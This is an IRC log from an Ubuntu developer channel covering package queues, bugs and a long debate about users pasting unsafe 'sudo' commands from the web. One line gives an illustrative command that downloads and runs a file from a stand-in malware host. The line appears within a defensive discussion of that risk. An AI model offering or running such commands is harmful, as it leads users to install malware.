
khermansi think the ubuntu 7.10 server image was created incorrectly00:19
dmbkhermans: what makes you say that?00:39
khermansdmb, the vmx file is configured for 64-bit but this is a 32-bit vmware00:39
dmboh, the vmware appliance?00:40
khermansdmb, the isv image, yes00:40
khermansdmb, so errors come up when you run it00:41
khermansdmb, its a simple fix, but i thinks its a bad release00:41
dmbill try and see if i can confirm00:41
khermansdmb, let me know if you find the same00:51
khermansdmb, i have to go now -- but i signed up on ubuntu-release -- maybe we can discuss on there00:52
khermansor feel free to email me any questions; kristian.hermansen ..at.. gmail.com00:53
gustavonareaHello. I'm learning Python and I'd like to have a look at real-world Python applications. I know Canonical/Ubuntu's developers are fond of Python, so I'd like to know what Python-powered application in the Ubuntu project you recommend me to have a look at? Thanks in advance.01:21
gustavonareaBTW, I'm willing to contribute code01:22
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* emgent heya16:23
|DuReX|is there some descent fix for dmraid compatibility with udev ?16:29
mpt|DuReX|, it's the holidays, so likely few developers are really here16:34
|DuReX|to bad :(16:34
|DuReX|i edited a udev rule16:36
|DuReX|now i don't have those gay 'attempt to access beyond drive limit' anymore :p16:37
|DuReX|but i need to find out how to make it creates a /dev/disk/by-uuid for the dmraid devices16:37
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warp10Bug #179407 Is there any reason why kubuntu-desktop shouldn't recommend ubufox?18:06
ubotuLaunchpad bug 179407 in kubuntu-meta "kubuntu-desktop should recommend ubufox" [Undecided,Confirmed] https://launchpad.net/bugs/17940718:06
blueyedwarp10: does it recommend firefox?18:08
blueyedDoes not look so.18:09
CheGuevarayeah we don't have firefox installed by default18:09
CheGuevaraso why would we have ubufox18:09
blueyedMakes no sense without firefox, yes.18:10
warp10blueyed, CheGuevara: but both xubuntu-desktop and edubuntu recommends firefox and ubufox. Does kubuntu-desktop installs another browser by default?18:10
blueyedyes, konqueror.18:11
warp10CheGuevara, blueyed: Ok, thanks, I'll report it in the bug report18:11
CheGuevaradon't worry about it i'll close it18:12
warp10CheGuevara: ok, ty18:12
theunixgeekHow do I access the emacs menus?18:22
jpatricktheunixgeek: support in #ubuntu18:23
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imbrandonwarp10: because kubuntu dosent use firefox, we use konqueror are the default browser18:32
warp10imbrandon: yeah, now I know that. I've just never used KDE and doesn't know it (almost) completely :)18:34
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Ubulettecould someone approve nss in hardy's NEW-bin queue ? it's blocking firefox 3 since Dec 22 :(19:25
CheGuevaraUbulette: not the best timing19:26
Ubulettei know but users dont care about timing, they keep asking me why it takes so long19:27
crimsunpaid developers have lives aside, too.19:28
CheGuevaratrue, but not archive admins will be here19:28
CheGuevarai myself got 3 packages in the queue19:28
crimsuna few more days until post 2008-01-01 won't kill anyone dying for ff319:28
UberCanuckanyone want to review a patch i submitted?19:29
crimsunpatch to what and where?19:29
UberCanuckBug #17941719:29
ubotuLaunchpad bug 179417 in pan "Viewing large images broken" [Undecided,Confirmed] https://launchpad.net/bugs/17941719:29
imbrandonheya crimsun19:29
imbrandonUbulette: you have to wait untill an archive day after the scheduled holiday break, btw did you fix the probelmwith ff3 icon not showing in KDE ?19:30
Ubuletteimbrandon, yes19:31
imbrandoncool, just checkin :)19:31
CheGuevaraUberCanuck: would be quicker if you post a debdiff and not just a patch19:31
UberCanuckCheGuevara: kewl - will do19:31
CheGuevaraUberCanuck: is it a universe package?19:32
Ubulettecrimsun, ok, i'll tell those begging users that they should have a life too, ubuntu being closed until further notice19:33
imbrandonUbulette: its not further notice, its a scheduled break , see the release schedule19:34
UberCanuckCheGuevara: main19:34
Ubuletteimbrandon, it was a sarcasm19:35
imbrandonUbulette: i know, i just dident appreciate the sarcasm , so i added a bit of my own :)19:35
* imbrandon hugs Ubulette 19:36
imbrandonanyhow , to give them a realistic ETA if thats what you are after is jan 3 , that give everyone time to get back and check the queues and it to build etc19:37
imbrandonmight be sooner or a bit later but that is a "good estimate"19:37
Ubuletteimbrandon, i don't like it when I work to produce timely updates and being blocked for weeks when a simple click is needed. so next time, i won't care about being in sync with upstream. that's it. I've learned my lesson.19:38
imbrandona simple "click" isnt all thats needed for NEW packages, actualy its the longest process we have19:39
imbrandonit takes alot of review to get through the NEW queue19:39
Ubulettein that case, it's just a soname bump19:39
imbrandonlicenses, suid bins , general package errors etc etc etc19:39
Ubulette..coming from debian19:40
crimsunUberCanuck: it seems http://bugzilla.gnome.org/attachment.cgi?id=100069&action=view is more appropriate.  Why does Pan need an additional patch?19:40
imbrandonUbulette: i understand your frustration , but again relize this only happens once a year, just unfortunate timing19:40
UberCanuckcrimsun: <shrug> because the version I'm using is still broken - so the upstream hasn't hit my laptop yet19:42
UberCanuckcrimsun: is the bug still valid?19:45
crimsunlool: / slomo: Are either of you around to pull in the patch posted at gnome #477860?  (http://bugzilla.gnome.org/attachment.cgi?id=100069&action=view)19:45
ubotuGnome bug 477860 in general "Pan has trouble displaying large jpegs using gtk+ 2.12" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=47786019:45
crimsunlool: / slomo: sorry, that's gnome 494667.19:46
ubotuGnome bug 494667 in gdk-pixbuf "gdkpixloader jpeg loader problems with some files" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=49466719:46
crimsunUberCanuck: it's not a Pan bug19:47
UberCanuckcrimsun: true, but its derived in pan when the change happened within pixbuf19:50
crimsunUberCanuck: I'd rather wait for a DD to upload to Debian so that it can be synced into Ubuntu.19:50
UberCanuckcrimsun: okay - thanks19:50
ThorstenSickI've got a question. Who to contact if I got some security-related design ideas ?20:31
CheGuevarais it something you want to keep private?20:31
ThorstenSickNo, not at all.20:31
ThorstenSickIs there a specific person managing security features ? Or just this channel ?20:32
CheGuevarathere's security@ubuntu.com20:32
CheGuevarabut tahts to report vulnurabilities20:32
CheGuevaraubuntu-devel@lists.ubuntu.com might be more appropriate20:33
ThorstenSickOn this list there was a discussion a few weeks ago about what to do when some pages just tell the user to sudo <evilstuff>...with no result.20:36
ThorstenSickI think there is still lots of stuff to do to make a one-user-who-is-admin ubuntu more secure20:37
mptCheGuevara, https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss20:44
ThorstenSickThanks. I am a member of this list already. I will try to sort my thoughts and write a mail as small as possible :-)20:45
mptThorstenSick, that was discussed on LugRadio too :-)20:47
mptThe problem with pages telling people to sudo <evilstuff>, I mean20:47
ThorstenSickAnd AFAIK some pages already tried it. I do not know how successful.20:48
mptI think the answer lies in considering why Windows and Mac OS X don't have the same problem20:48
mpt(They have other security problems, but not this one)20:49
ThorstenSickThe normal windows user has admin rights. But they do not enter some obscure stuff at the command line normally.20:50
ThorstenSickFor linux newbies, doing obscure stuff is normal20:50
mptIn the Windows and Mac OS X user base, there is a culture that if some Web page is asking you to enter commands in the terminal *at all*, it's highly suspicious20:51
ThorstenSickAnd people won't find the terminal20:51
mptThat's part of it, yes20:51
ThorstenSickBut windows user click on every icon they see. (And the executable rights are tied to the file extension)20:52
mptRight, that's why I said "They have other security problems, but not this one"20:52
mptSo "all" we need to do is get to the point where a non-programmer never needs to use the terminal to use Ubuntu.20:53
mptThen they'll start treating instructions to enter stuff into the terminal as suspicious, and rightly so.20:53
ThorstenSickAnd add some better warning "You are entering a dangerous area. Beware of wild animals"20:54
mptIt can be dedicated to those people who know what they're doing, or who are using a trusted source of information (e.g. a book on how to learn programming).20:55
ThorstenSickYes. Is there a plan to implement a collection of small scripts to solve all the little problems the users have ? These could be signed.20:56
mptThere's no *single* plan for that20:57
mptIndividual things that require non-programmers to use the terminal (or to edit text configuration files) tend to be replaced by individual graphical utilities, which have individual specifications20:58
mpt(even when they would make more sense as additions to existing utilities, unfortunately)20:58
ThorstenSickIt will take lots of time to implement all the small fixes the users want.20:58
ThorstenSickAn easy to where every one could write a plug in without much experience would be more effective, I think. There will always be a small feature missing.21:00
mptAn easy what?21:01
ThorstenSickAn easy API.21:01
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ThorstenSickA tool just offering a menu to all the plug-ins. Each one solving a small problem.21:01
mptAn easy API is important for all sorts of programming, not just for small utilities :-)21:02
mptCan you give an example or two?21:02
ThorstenSickJepp. But here I want the people normally writing the howtos and wikis to be able to write a plug in.21:02
ThorstenSickshould just be something like:21:02
ThorstenSickcopy(file1, file1.backup)21:03
ThorstenSickadd_line(file1,"new host")21:03
ThorstenSickThe user should be able to see what it does, before executing the plug in.21:03
ThorstenSick(The plug in copies the file x to y and adds the line FOO to it)21:04
ThorstenSickThe plugin must be reviewed, signed and released21:04
mptWhat is file1 in this example?21:04
ThorstenSickIn a working example it is a specific config file.21:05
mptWhich config file?21:05
ThorstenSickLet me just write a specific example. Still pseudo code:21:07
ThorstenSickcopy("/etc/apt/sources.list", "/etc/apt/sources.list_backup")21:08
mptI think that's a good example of why this would be a bad idea :-)21:08
ThorstenSickWhy ?21:09
mptupdate-manager does special things to ensure that the upgrade from 7.04 to 7.10 works21:09
mptI don't know the details, but I do know that it's more than just changing the sources.list and doing apt-get update21:09
mptFollowing that manual process specified on ubuntuguide.org will work sometimes, but it's not guaranteed to work.21:10
ThorstenSickI seem not to be good at choosing examples :-)21:10
ThorstenSickMy intentions are:21:10
mptSo you're much better off using the graphical method21:11
ThorstenSicka) Have a restricted API. So the script writer can not execute every command from command line (like with a system call)21:11
mptand Ubuntu is better off encouraging you to use the graphical method, rather than implementing a process for signing the script to use the manual method.21:11
ThorstenSickb) Be able to output what the plug in will do before it does anything21:11
pochuAnd you can add repositories from Software Sources.21:11
mptThorstenSick, who are you proposing would sign the scripts, anyway?21:12
ThorstenSickc) Have plugins which can easily be reviewed21:12
mptReviewed by who?21:12
ThorstenSickI fear the only one who can sign it are ubuntu "officials" these scripts must be in the normal repositories21:13
ThorstenSickThe central idea is to move the scripts away from the untrusted web to the trusted repository21:14
|DuReX|it sux that Ubuntu fucks up UUID's with dmraid :(21:15
mptThorstenSick, many of the current "Enter this stuff in the terminal" instructions are to achieve things that weren't foreseen when the OS was released.21:15
mptFor example, installing versions of software that aren't packaged for that release.21:15
mptOr doing particular things with X to work around bugs that weren't known at the time.21:16
CheGuevara!language | |DuReX|21:16
ubotu|DuReX|: Please watch your language and topic to help keep this channel family friendly.21:16
mptIf you're saying these scripts should be in the official repositories, then why not just fix the particular problems properly in the official repositories instead?21:16
ThorstenSickThen there would be no way to get these instructions of the web21:17
mptFor example, package the new versions of the software, or fix the bugs in X, or whatever.21:17
|DuReX|i'm trying to get it working for 3 days now, seems like nobody can help me ?21:17
CheGuevara|DuReX|: #ubuntu is the help chanel21:17
|DuReX|nobody there seems able to help me ... :s21:17
mpt|DuReX|, have you tried #ubuntu, <http://forums.ubuntu.com/>, and <https://answers.launchpad.net/ubuntu>?21:17
ThorstenSickThe fix would be the best solution. Together with GUI tools.21:18
|DuReX|yes mpt :(21:18
mptThorstenSick, so how are you proposing that a user get from seeing the script on the Web, to installing the script from an official repository?21:19
ThorstenSickThe web page must offer the id of the script to solve the problem (If you also got the same problems with X, Plug in number 123 solves it)21:20
ThorstenSickMayb add some special link to the page21:21
ThorstenSickThese scripts must be updated _between_ releases.21:21
imbrandonsounds like a fix for things like that just need to hit SRU or backports, instead of scripts21:22
mpt|DuReX|, if it's important enough that you're willing to pay to get it fixed, try <http://www.ubuntu.com/support/commercial/marketplace>21:22
imbrandoneducating people about those would be far more helpfull than a whole new sytem21:22
crimsunthere's also something that leaves a sour aftertaste regarding randomly installing plugins to resolve problems.  (Not that I have much room to speak.)21:24
mptThorstenSick, an URL protocol so you could click on a link in a Web page, and have the package manager launch with the relevant package selected, would be very nifty -- but it would be nifty for every package, not just for scripts :-)21:24
ThorstenSickI fear it is almost impossible to do security education21:24
mptAnd if you're suggesting that problems be solved between releases, some already are, but most (nearly all) are solved by updated packages rather than by new workaround scripts21:25
mptmost -> most of those21:26
ThorstenSickIt is not a perfect solution. The best soultion would be to have everything running out of the box. If this is not possible, we should offer an easy way to fix the problems without messing with the system21:26
mptIf writing a script was an efficient way of fixing problems between releases, I expect the developers would be doing that much more often, instead of just releasing fixed packages as they do.21:27
ThorstenSickA fixed package must be tested.21:27
mptSo must a script!21:27
ThorstenSickSo must a script. But a script is small. With only a few dependencies21:29
crimsunthey're also capable of doing interesting things, e.g., the first few revisions of automatix.21:29
ThorstenSickmost of the tips are just "sudo apt-get install foo" tips. With a few settings afterwards or before (adding new repos)21:30
ThorstenSickThese could be moved to "start synaptic..."21:31
mptI think adding arbitrary new repositories is reintroducing the security problem you're trying to solve21:31
ThorstenSickYes, it is. But there we could enforce signing :-)21:31
mptsigning by who? :-)21:31
mpt"sudo apt-get install foo" instructions could be replaced by the URL handler I mentioned21:32
mptthat passes off to the package manager21:32
ThorstenSickSorry. i do not want to add new repos. i was just reading the ubuntuguide wiki21:32
ThorstenSickDoing som small statistics21:32
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ThorstenSickCleaning this wiki and others of every line starting with sudo by either adding the URL handler or bugfixes would help21:33
ThorstenSickEverything left would be a candidate for these plugin script system21:34
mptThis reminds me of <http://hivelogic.com/articles/installing-mysql-on-mac-os-x/> and <http://diveintomark.org/archives/2007/11/11/installing-mysql-on-ubuntu> (read them in that order)21:34
ThorstenSickI love Debian and Ubuntu21:38
imbrandonalso apturl should take care of most of this21:39
imbrandonanother release or two and all releases should have it21:40
ThorstenSickThis would remove many of the sudo tips21:40
imbrandonbtw does kubuntu support apturl ?21:41
mptooooo noooo21:43
mptapturl uses "Yes" and "No" buttons21:44
imbrandonahh i wasent sure if it called synaptic21:44
imbrandonor did it its self21:44
imbrandonwas more what i was asking :)21:44
imbrandoni hadent actualy looked at it21:44
mptbut still, that's 90% of the way there21:45
imbrandonoh definately21:45
mptNow nag all the tutorial sites to start using it :-)21:45
imbrandonheh nag christer and everyone else will follow in line :)21:45
* imbrandon jokes21:46
imbrandonmpt: dident you author apturl ?21:46
ChipzzThorstenSick: you really can not be serious about fixing things with scripts. Have you seen the problems caused by automatix?21:47
mptimbrandon, I think you've confused me with a programmer21:47
Chipzzalso "a script"21:47
imbrandonmpt: hehe21:48
sorenimbrandon: I think mvo is who you're looking for :)21:49
imbrandonprobably, not really "looking for" though :)21:49
ThorstenSickI do not want to fix all the problems with script. They should be a work around till the problem is solved. Thes should substitute the scripts printed on web pages telling the user to sudo this and sudo that.21:49
imbrandonThorstenSick: what about just fixing it in the dev release and backporting the fix, then even those that dont read the tutorial benifet21:50
ThorstenSickAt the moment users a trained to copy everything they read online into a terminal21:50
ThorstenSickWould be the best solution.21:50
imbrandonmy point is there are already things in place to "fix" your problem, they are just under utilized imho21:51
ThorstenSickBut as long as there are pages telling the users to solve their problems using sudo in terminals, this is a vulnerability of ubuntu21:51
mptThorstenSick, the reason you want to substitute the instructions on Web pages is to make them more secure, and the only way to make them more secure is to apply all the same procedures as happen for real fixes, and if you're going to apply all the same procedures, you might just as easily do that in fixing the problem properly.21:51
imbrandonexatly what i was trying to say, but mpt said it better21:52
mptThere is no "Free Lunch" setting on this slider.21:52
ThorstenSicksudo wget ht tp://malware-online.com/stuff; chmod +x stuff; ./stuff21:52
imbrandonThorstenSick: those will *ALWAYS* exist, even if we make this script repo, there wills till be someone that says "its just easyer for me to blog about how to fix it manualy , than subit a script for review" then your back to square one with a new security layer to maintain21:53
ThorstenSickI want to offer all thos volunteers an alternative to write a web page with tips. I want to create a system where tips and tricks can be signed.21:53
imbrandonThorstenSick: then make a "proof-of-concept" no one says the ubuntu repos have to be the only "trusted" ones many community repos have become "trusted" like seveas's etc21:55
imbrandonbut again i agree with mpt 100% , if your gonna do that might as well fix the real problem21:55
Chipzzimbrandon: but what if it isn't actually "a problem"21:56
imbrandonbackports and SRUs dont have to be slow, if people were educated more to request new ones correctly it would help greatly with your problem21:57
mptWas seveas the one who put an updated screensaver package in his repository, which changed the default background picture to a big warning not to use third-party repositories willy-nilly?21:57
imbrandonmpt: yea iirc21:57
Chipzzimbrandon: say, just a very simple example (and a bad one since we have a GUI for that already), enabling universe/multiverse by editing /etc/apt/sources.list ?21:57
Chipzzimbrandon: or enabling a feature by editting a config file in general?21:57
imbrandonChipzz: still better to fix the underlying problem ( and those are on by default now since feisty iirc )21:58
imbrandonwhich in this case it was fixed21:58
imbrandonmpt: hahah yea thats the one21:59
ThorstenSickGood idea21:59
Chipzzimbrandon: lets say I have a tutorial on my webpage explaining how to use LDAP for logins. How do you suggest "fixing" that? You can not enable LDAP by default, since you don't know the server, and most people do not want LDAP enabled logins22:00
Chipzzimbrandon: what do you suggest "the underlying problem" is there, and which package would you fix?22:00
imbrandonChipzz: he isnt sugesting replacing tutorals , he is saysing for working arround "problems"22:00
Chipzz(yes I'm aware that there is a package being developed to make it easier to configure)22:00
imbrandontutorals will always exist22:00
mptChipzz, pester ajmitch to finish his LDAP configuration utility so that Ubuntu ships with a graphical utility to do that. Then, write the tutorials about how to use the built-in utility.22:01
ThorstenSickSorry, there was a mis-understanding. The problems I was talking about are not bugs22:01
imbrandoneven when there are simple gui's, i'm sure you could find a tutoral about changing the desktop walpaper for your fav OS too22:01
Chipzzmpt: 23:01 < Chipzz> (yes I'm aware that there is a package being developed to make it easier to configure)22:01
Chipzzmpt: ;)22:01
ThorstenSickThey are these small tutorials, tips, fixes22:01
Chipzzmpt: I just failed to come up with a better example; feel free to give a better example if you come up with one ;)22:02
Chipzzbecause I'm sure there are22:02
mptChipzz, I think that solution generalizes to all examples, except in the areas of learning to program or sysadmin (for which I'd recommend learning from a trustworthy book rather than a random Web site).22:04
Chipzzmpt: slightly different category, but... how about legally encumbered features?22:05
Chipzzfor example, encoding .3gp files with ffmpeg IIRC. people will have to compile their own versions because we can't ship it22:05
Chipzzmpt: and while you're right that the "meta-fix" to such problems is creating configuration utilities, the problem with that fix is you need manpower22:07
mptChipzz, I'd propose that trusted tutorials use apt: to link to proprietary software in the partners repository to do those functions.22:07
loolcrimsun: Committed patch for GNOME #494667 in SVN; will be part of next upload22:07
ubotuGnome bug 494667 in gdk-pixbuf "gdkpixloader jpeg loader problems with some files" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=49466722:07
loolcrimsun: Thanks!22:07
crimsunlool: thank /you/ !22:07
Chipzzmpt: that may be a problem an sich too; take for example the example of linking to w32codecs packages on the ubuntu wiki22:08
mptChipzz, it's getting outside Ubuntu's ambit to make copyright/patent infringement a secure thing to do :-)22:08
* Chipzz afk again :)22:09
mptAnd time for me to go home22:09
ThorstenSickThanks and CU22:10
ThorstenSickI think the best option is to write a proof of concept.22:10
mptThorstenSick, I suggest you pick one problem you want to solve, figure out a good graphical way of solving it, and do what you can to develop that solution and get it into Ubuntu Main22:11
mptThen go on to another22:11
mptI think that will be more effective in the long run than implementing a Workaround Installation System.22:11
ThorstenSickThanks. I will check for alternatives to solve the problem.22:13
ThorstenSickGood night22:27
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Riddellimbrandon: tonio was working on apturl as part of kio-apt, see his blog23:40

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